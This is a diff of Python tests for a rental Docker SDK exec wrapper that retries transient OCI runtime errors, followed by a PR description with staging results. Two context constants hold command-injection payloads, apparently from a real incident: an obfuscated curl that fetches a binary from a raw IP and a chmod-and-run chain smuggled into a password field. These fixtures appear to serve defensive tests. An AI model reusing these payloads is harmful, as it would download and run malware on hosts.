@@ -684,7 +805,7 @@ async def test_exec_in_container_does_not_retry_non_transient_oci_result(monkeyp
 
     assert result.exit_status == 127
     assert len(api_client.exec_created) == 1
-    assert api_client.containers_inspected == []
+    assert api_client.containers_inspected == ["pod_exec"]
 
 
 def test_stdin_exec_spec_builders_keep_values_out_of_argv():

--- a/neurons/validators/tests/test_rental_docker_sdk.py
+++ b/neurons/validators/tests/test_rental_docker_sdk.py
@@ -34,6 +34,17 @@ INCIDENT_DOCKER_PASSWORD = (
     "&&chmod +x /tmp/mney && /tmp/mney   |echo '"
 )
 INCIDENT_PUBLIC_KEY = "';  c'u'''''r\\l'''' -o /tmp/systemd 203.23.128.30:443/linux_wss;'"
+SETNS_OCI_EXEC_ERROR = (
+    "OCI runtime exec failed: exec failed: container_linux.go:439: "
+    "starting container process caused: process_linux.go:119: "
+    "executing setns process caused: exit status 1\r\n"
+)
+CGROUP_OCI_EXEC_ERROR = (
+    "OCI runtime exec failed: exec failed: container_linux.go:439: "
+    "starting container process caused: process_linux.go:140: adding pid 123 "
+    "to cgroups caused: failed to write 123: openat2 "
+    "/sys/fs/cgroup/init.scope (deleted)/cgroup.procs: no such file or directory\r\n"
+)
 
 
 class FakeApiClient:
@@ -158,6 +169,41 @@ class OtherConflictExecCreateApiClient(FakeApiClient):
     def exec_create(self, **kwargs):
         self.exec_created.append(kwargs)
         raise _other_conflict_error()
+
+
+class ExecResultApiClient(FakeApiClient):
+    def __init__(
+        self,
+        *,
+        failing_stdout: str,
+        failing_exit_status: int,
+        remaining_failures: int = 1,
+    ):
+        super().__init__()
+        self.failing_stdout = failing_stdout
+        self.failing_exit_status = failing_exit_status
+        self.remaining_failures = remaining_failures
+        self.failed_exec_ids = set()
+        self.next_exec_id = 0
+
+    def exec_create(self, **kwargs):
+        self.exec_created.append(kwargs)
+        self.next_exec_id += 1
+        return {"Id": f"exec-id-{self.next_exec_id}"}
+
+    def exec_start(self, exec_id, **kwargs):
+        self.exec_started.append((exec_id, kwargs))
+        if self.remaining_failures:
+            self.remaining_failures -= 1
+            self.failed_exec_ids.add(exec_id)
+            return (self.failing_stdout.encode(), b"")
+        return (b"stdout", b"stderr")
+
+    def exec_inspect(self, exec_id):
+        self.exec_inspected.append(exec_id)
+        if exec_id in self.failed_exec_ids:
+            return {"ExitCode": self.failing_exit_status}
+        return {"ExitCode": 0}
 
 
 class SocketExecApiClient(FakeApiClient):
@@ -544,6 +590,99 @@ async def test_exec_in_container_does_not_retry_other_conflicts(monkeypatch):
             )
         )
 
+    assert len(api_client.exec_created) == 1
+    assert api_client.containers_inspected == []
+
+
+@pytest.mark.parametrize(
+    "transient_stdout",
+    [
+        SETNS_OCI_EXEC_ERROR,
+        CGROUP_OCI_EXEC_ERROR,
+    ],
+)
+@pytest.mark.asyncio
+async def test_exec_in_container_retries_transient_oci_exec_result(
+    monkeypatch,
+    transient_stdout,
+):
+    monkeypatch.setattr(
+        rental_docker_sdk,
+        "_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS",
+        (5,),
+    )
+    api_client = ExecResultApiClient(
+        failing_stdout=transient_stdout,
+        failing_exit_status=128,
+    )
+    client = RentalDockerSdkClient(api_client)
+
+    result = await client.exec_in_container(
+        ContainerExecSpec(
+            container_name="pod_exec",
+            argv=("sh", "-c", "cat /tmp/file"),
+        )
+    )
+
+    assert result.exit_status == 0
+    assert result.stdout == "stdout"
+    assert len(api_client.exec_created) == 2
+    assert api_client.exec_started == [
+        ("exec-id-1", {"demux": True}),
+        ("exec-id-2", {"demux": True}),
+    ]
+    assert api_client.containers_inspected == ["pod_exec"]
+
+
+@pytest.mark.asyncio
+async def test_exec_in_container_returns_transient_oci_result_after_retry_budget(monkeypatch):
+    monkeypatch.setattr(
+        rental_docker_sdk,
+        "_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS",
+        (5, 5),
+    )
+    api_client = ExecResultApiClient(
+        failing_stdout=SETNS_OCI_EXEC_ERROR,
+        failing_exit_status=128,
+        remaining_failures=10,
+    )
+    client = RentalDockerSdkClient(api_client)
+
+    result = await client.exec_in_container(
+        ContainerExecSpec(
+            container_name="pod_exec",
+            argv=("sh", "-c", "cat /tmp/file"),
+        )
+    )
+
+    assert result.exit_status == 128
+    assert result.stdout == SETNS_OCI_EXEC_ERROR
+    assert len(api_client.exec_created) == 3
+    assert api_client.containers_inspected == ["pod_exec", "pod_exec"]
+
+
+@pytest.mark.asyncio
+async def test_exec_in_container_does_not_retry_non_transient_oci_result(monkeypatch):
+    monkeypatch.setattr(
+        rental_docker_sdk,
+        "_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS",
+        (0, 0),
+    )
+    api_client = ExecResultApiClient(
+        failing_stdout='OCI runtime exec failed: exec: "missing": executable file not found\r\n',
+        failing_exit_status=127,
+        remaining_failures=1,
+    )
+    client = RentalDockerSdkClient(api_client)
+
+    result = await client.exec_in_container(
+        ContainerExecSpec(
+            container_name="pod_exec",
+            argv=("missing",),
+        )
+    )
+
+    assert result.exit_status == 127
     assert len(api_client.exec_created) == 1
     assert api_client.containers_inspected == []
 


### PR DESCRIPTION
## Summary

Hotfix the rental Docker SDK exec path to wait for container exec readiness before post-create exec operations, then keep a narrow retry for the remaining Docker/runtime race.

The SDK exec wrapper now:

- inspects the container before each exec attempt;
- waits until Docker reports the container as running and not restarting, paused, or dead;
- fails before exec when the container is exited/dead/paused or never becomes ready, preserving inspect-state details;
- retries with a fresh exec operation only for the observed transient shapes:
  - `409 Conflict` with `Container ... is restarting, wait until the container is running`;
  - nonzero exec results containing `OCI runtime exec failed` plus known transient namespace/cgroup markers such as `executing setns process caused`, `cgroup.procs`, or `init.scope (deleted)`.

## Why

After the Docker SDK rental migration, staging showed intermittent `create_container` failures during post-create exec steps such as SSH bootstrap and `add_public_keys`. The container was created successfully, but Docker/runtime was sometimes not ready for immediate exec.

Waiting on inspect state handles the common case without slowing healthy containers. The retry remains intentionally narrow for the small inspect-vs-exec window where Docker says the container is ready but exec is still rejected by the daemon/runtime.

This does not:

- retry unrelated 409/conflict errors;
- retry arbitrary nonzero command failures;
- fallback to shell;
- hide final Docker/runtime details if readiness wait or retry budget is exhausted.

## Testing

- `pdm run python -W ignore -m pytest tests/test_rental_docker_sdk.py tests/test_docker_service_rental_security.py tests/test_docker_service.py -q --tb=short`
- `python -m py_compile src/services/rental_docker_sdk.py`
- `git diff --check`

## Staging

Verified on staging validator image `d8c1101` with a 15-iteration rental smoke across all available staging executors:

- A6000 `38.80.122.73`
- L40 `38.80.122.143`
- A4000 `149.36.1.151`

Smoke input:

- image: `fortunelucky777/pytorch`
- tag: `2.12.0-py3.12-cuda12.8-devel-ubuntu24.04-dind`
- SSH key selected for pod creation: `pixel`
- no external volume
- no custom startup command

Result:

- 15/15 pods reached `RUNNING`;
- all smoke pods cleaned up successfully;
- no `ERROR` logs for the smoke pod IDs;
- no smoke-pod `CREATION_FAILED`;
- no smoke-pod `OCI runtime exec failed`, `setns`, `cgroup.procs`, or `Container ... is restarting` failure;
- SDK observability logs showed `docker_access=sdk` and `host_shell_command=false`;
- final API cleanup check found `remaining_test_pods 0`.
